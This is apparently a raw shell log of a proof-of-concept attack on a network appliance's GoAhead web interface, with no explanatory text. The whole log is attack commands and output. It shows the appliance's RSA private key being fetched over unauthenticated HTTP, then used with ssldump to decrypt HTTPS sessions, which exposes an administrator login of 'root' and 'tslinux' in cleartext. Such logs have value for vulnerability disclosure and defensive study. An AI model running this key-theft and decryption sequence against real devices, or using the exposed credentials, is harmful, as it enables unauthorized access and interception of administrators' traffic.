myprompt:~ # id uid=0(root) gid=0(root) groups=0(root) myprompt:~ # wget -S http://acs/Locale/server.pem --12:12:08-- http://acs/Locale/server.pem => `server.pem' Resolving acs... 192.168.XXX.YYY Connecting to acs|192.168.XXX.YYY|:80... connected. HTTP request sent, awaiting response... HTTP/1.0 200 OK Date: Tue Jun 27 03:15:37 2006 Server: GoAhead-Webs Last-modified: Wed Mar 3 18:04:18 2004 Content-length: 2229 Content-type: text/plain Length: 2,229 (2.2K) [text/plain] 100%[====================================>] 2,229 --.--K/s 12:12:08 (6.38 MB/s) - `server.pem' saved [2229/2229] myprompt:~ # grep KEY server.pem -----BEGIN RSA PRIVATE KEY----- -----END RSA PRIVATE KEY----- myprompt:~ # ssldump -Ad -n -k server.pem -i eth1 port 443 and host acs New TCP connection #1: 192.168.AAA.ZZZ(2635) <-> 192.168.XXX.YYY(443) 1 1 0.0079 (0.0079) C>S SSLv2 compatible client hello Version 3.0 cipher suites Unknown value 0x78 Unknown value 0x77 SSL_DHE_DSS_WITH_RC4_128_SHA Unknown value 0x5c Unknown value 0x58 Unknown value 0x57 Unknown value 0x56 Unknown value 0x54 Unknown value 0x52 Unknown value 0x51 Unknown value 0x50 Unknown value 0x4f Unknown value 0x4e Unknown value 0x4c Unknown value 0x4b SSL_ECDH_ECDSA_WITH_3DES_EDE_CBC_SHA SSL_ECDH_ECDSA_WITH_DES_CBC_SHA SSL_ECDH_ECDSA_WITH_RC4_128_SHA SSL_DHE_RSA_WITH_AES_256_CBC_SHA SSL_DHE_RSA_WITH_AES_128_CBC_SHA SSL_DHE_DSS_WITH_AES_256_CBC_SHA SSL_DHE_DSS_WITH_AES_128_CBC_SHA SSL_RSA_WITH_AES_256_CBC_SHA SSL_RSA_WITH_AES_128_CBC_SHA SSL_DHE_RSA_WITH_3DES_EDE_CBC_SHA SSL_DHE_DSS_WITH_3DES_EDE_CBC_SHA SSL_RSA_WITH_3DES_EDE_CBC_SHA SSL_RSA_WITH_RC4_128_SHA SSL_RSA_WITH_RC4_128_MD5 SSL2_CK_RC4 SSL2_CK_3DES SSL2_CK_RC2 1 2 0.0198 (0.0118) S>CV3.0(74) Handshake ServerHello Version 3.0 random[32]= 44 a0 f7 79 2f 91 c6 56 4f 95 c1 59 31 00 88 3a 09 35 e6 e9 fe b7 a4 da f3 fe 69 15 06 86 55 35 session_id[32]= 84 28 ea bc d9 84 04 4d b6 a7 8c fb 74 6c 95 ec 95 e1 2e e9 ca 19 fd 34 8d 66 16 36 9e 5a fc c2 cipherSuite SSL_RSA_WITH_AES_256_CBC_SHA compressionMethod NULL 1 3 0.0198 (0.0000) S>CV3.0(961) Handshake Certificate 1 4 0.0198 (0.0000) S>CV3.0(4) Handshake ServerHelloDone 1 5 0.0209 (0.0011) C>SV3.0(132) Handshake ClientKeyExchange EncryptedPreMasterSecret[128]= be 60 43 d6 49 f6 d3 2b a6 0b 90 70 41 66 ff 8e ab 4c 6d 44 6c 71 cb 04 cf 06 30 30 fb 04 a2 b5 b0 ff f9 8a ae 54 11 f2 65 27 77 19 9e 90 50 e2 34 54 16 56 b8 cf a0 d0 33 5d a6 52 4c 29 93 04 4e 02 b9 c6 d2 ba 6d ea 61 3a 85 66 ff 3b 99 7d dc b1 73 f8 a5 c2 a9 0e 63 35 ae 6c 03 19 70 d4 59 f9 53 57 06 2f 04 d8 d5 69 89 e4 8f f4 ef 4f 93 f9 77 28 12 90 d2 1f 40 87 ba f4 97 53 d3 3a 1 6 0.0209 (0.0000) C>SV3.0(1) ChangeCipherSpec 1 7 0.0209 (0.0000) C>SV3.0(64) Handshake Finished md5_hash[16]= ed de d5 f1 8b af da 3b e4 64 ad 96 91 04 44 19 sha_hash[20]= 21 fd a1 f3 2b 13 c3 71 96 76 c3 99 2d b8 f8 4c ef 38 7b a8 1 8 0.4578 (0.4368) S>CV3.0(1) ChangeCipherSpec 1 9 0.4578 (0.0000) S>CV3.0(64) Handshake Finished md5_hash[16]= 64 0e 0c 03 48 e3 66 7d bb 56 91 38 58 c7 ac b8 sha_hash[20]= f5 e4 6e 8d 51 21 22 cb 9b 16 60 59 e4 2e 3b 82 f0 bf c4 de 1 10 0.5593 (0.1015) C>SV3.0(480) application_data --------------------------------------------------------------- POST /goform/Dmf HTTP/1.1 User-Agent: Mozilla/5.0 (compatible; Konqueror/3.5) KHTML/3.5.1 (like Gecko) Referer: https://acs/login.asp Pragma: no-cache Cache-control: no-cache Accept: text/html, image/jpeg, image/png, text/*, image/*, */* Accept-Encoding: x-gzip, x-deflate, gzip, deflate Accept-Charset: iso-8859-1, utf-8;q=0.5, *;q=0.5 Accept-Language: en, de Host: acs Content-Type: application/x-www-form-urlencoded Connection: Keep-Alive --------------------------------------------------------------- 1 11 0.5660 (0.0067) C>SV3.0(48) application_data --------------------------------------------------------------- Content-Length: 116 --------------------------------------------------------------- 1 12 0.5660 (0.0000) C>SV3.0(144) application_data --------------------------------------------------------------- urlOk=%2Fredirect.asp&urlError=%2Flogin.asp&request=1012&system.login.username=root&system.login.password=tslinux--------------------------------------------------------------- 1 13 0.8117 (0.2456) S>CV3.0(32) application_data --------------------------------------------------------------- --------------------------------------------------------------- 1 14 0.8117 (0.0000) S>CV3.0(48) application_data --------------------------------------------------------------- HTTP/1.0 302 Redirect --------------------------------------------------------------- 1 15 0.8143 (0.0025) S>CV3.0(32) application_data --------------------------------------------------------------- --------------------------------------------------------------- 1 16 0.8143 (0.0000) S>CV3.0(48) application_data --------------------------------------------------------------- Server: GoAhead-Webs --------------------------------------------------------------- 1 17 0.8174 (0.0031) S>CV3.0(32) application_data --------------------------------------------------------------- --------------------------------------------------------------- 1 18 0.8174 (0.0000) S>CV3.0(64) application_data --------------------------------------------------------------- Date: Tue Jun 27 03:16:42 2006 --------------------------------------------------------------- 1 19 0.8204 (0.0030) S>CV3.0(32) application_data --------------------------------------------------------------- --------------------------------------------------------------- 1 20 0.8204 (0.0000) S>CV3.0(64) application_data --------------------------------------------------------------- Pragma: no-cache Cache-Control: no-cache --------------------------------------------------------------- 1 21 0.8232 (0.0027) S>CV3.0(32) application_data --------------------------------------------------------------- --------------------------------------------------------------- 1 22 0.8232 (0.0000) S>CV3.0(48) application_data --------------------------------------------------------------- Content-Type: text/html --------------------------------------------------------------- 1 23 0.8261 (0.0028) S>CV3.0(32) application_data --------------------------------------------------------------- --------------------------------------------------------------- 1 24 0.8261 (0.0000) S>CV3.0(64) application_data --------------------------------------------------------------- Location: https://acs/login.asp --------------------------------------------------------------- 1 25 0.8287 (0.0025) S>CV3.0(32) application_data --------------------------------------------------------------- --------------------------------------------------------------- 1 26 0.8287 (0.0000) S>CV3.0(32) application_data --------------------------------------------------------------- --------------------------------------------------------------- 1 27 0.8325 (0.0038) S>CV3.0(32) application_data --------------------------------------------------------------- --------------------------------------------------------------- 1 28 0.8325 (0.0000) S>CV3.0(224) application_data --------------------------------------------------------------- This document has moved to a new location. Please update your documents to reflect the new location. --------------------------------------------------------------- 1 0.8333 (0.0007) S>C TCP FIN 1 0.8370 (0.0037) C>S TCP FIN New TCP connection #2: 192.168.AAA.ZZZ(2636) <-> 192.168.XXX.YYY(443) 2 1 0.0102 (0.0102) C>S SSLv2 compatible client hello Version 3.0 cipher suites [...]